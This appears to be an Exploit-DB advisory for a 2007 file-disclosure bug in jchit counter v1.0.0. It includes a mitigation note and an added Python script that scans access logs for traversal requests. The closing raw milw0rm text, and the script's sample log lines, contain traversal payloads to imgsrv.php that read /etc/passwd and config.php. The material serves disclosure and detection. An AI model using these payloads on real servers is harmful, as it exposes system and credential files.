Remote File Disclosure Vulnerability
vendor: jchit counter
by: Dj7xpl
CVSS: N/A
Severity: MEDIUM
CWE: 22
Product Name: jchit counter
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

jchit counter v1.0.0

The vulnerability allows an attacker to disclose local files on the server by manipulating the 'acc' parameter in the 'imgsrv.php' script. The attacker can access sensitive files such as the '/etc/passwd' file or the 'config.php' file.

Mitigation:

The vendor should implement input validation and sanitization to prevent directory traversal attacks. Additionally, sensitive files should be stored outside the web root or have proper access restrictions.
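
Because no patch exists, operators can also hunt for the request pattern described above in web server access logs. The following is an added example, not part of the original advisory or of jchit counter; the Apache-style log format, the /counter/ path, the function names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache-style access-log format (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Apr/2007:10:01:02 +0000] "GET /counter/imgsrv.php?acc=site1 HTTP/1.1" 200 312',
    '198.51.100.9 - - [22/Apr/2007:10:01:09 +0000] "GET /counter/imgsrv.php?acc=../config.php%00 HTTP/1.1" 200 812',
    '198.51.100.9 - - [22/Apr/2007:10:01:11 +0000] "GET /counter/imgsrv.php?acc=../../../../../etc/passwd%00 HTTP/1.1" 200 1190',
    '203.0.113.4 - - [22/Apr/2007:10:02:30 +0000] "GET /index.php?acc=../x HTTP/1.1" 404 210',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so values that were encoded more than once are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_acc(value):
    """Return the reasons an 'acc' value looks like a file-disclosure attempt."""
    v = fully_decode(value).replace("\\", "/")
    reasons = []
    if "\x00" in v:                 # %00 terminator, as in the advisory
        reasons.append("null-byte")
    if ".." in v.split("/"):        # a '..' path segment
        reasons.append("traversal")
    if v.startswith("/"):           # absolute path instead of a counter name
        reasons.append("absolute-path")
    return reasons

def scan(lines):
    """Yield (line_number, acc_value, reasons) for suspicious imgsrv.php requests."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/imgsrv.php"):
            continue
        # parse_qs performs the first round of percent-decoding
        for acc in parse_qs(url.query, keep_blank_values=True).get("acc", []):
            reasons = classify_acc(acc)
            if reasons:
                yield n, acc, reasons
```

A hit with a 200 status and a response size unlike normal counter images is worth prioritising, since it suggests file contents were returned.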

Exploit-DB raw data:

                                                     Y! Underground Group
						        http://2600.ir

								
								
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Portal.......:   jchit counter v1.0.0
Download.....:   http://developers.jccorp.net
Type.........:   Remote File Disclosure Vulnerability
Author.......:   Dj7xpl / dj7xpl@2600.ir
HomePage.....:   http://Dj7xpl.2600.ir

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Bug..........:

imgsrv.php?acc=[Local File]%00
imgsrv.php?acc=../../../../../etc/passwd%00
imgsrv.php?acc=../config.php%00

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]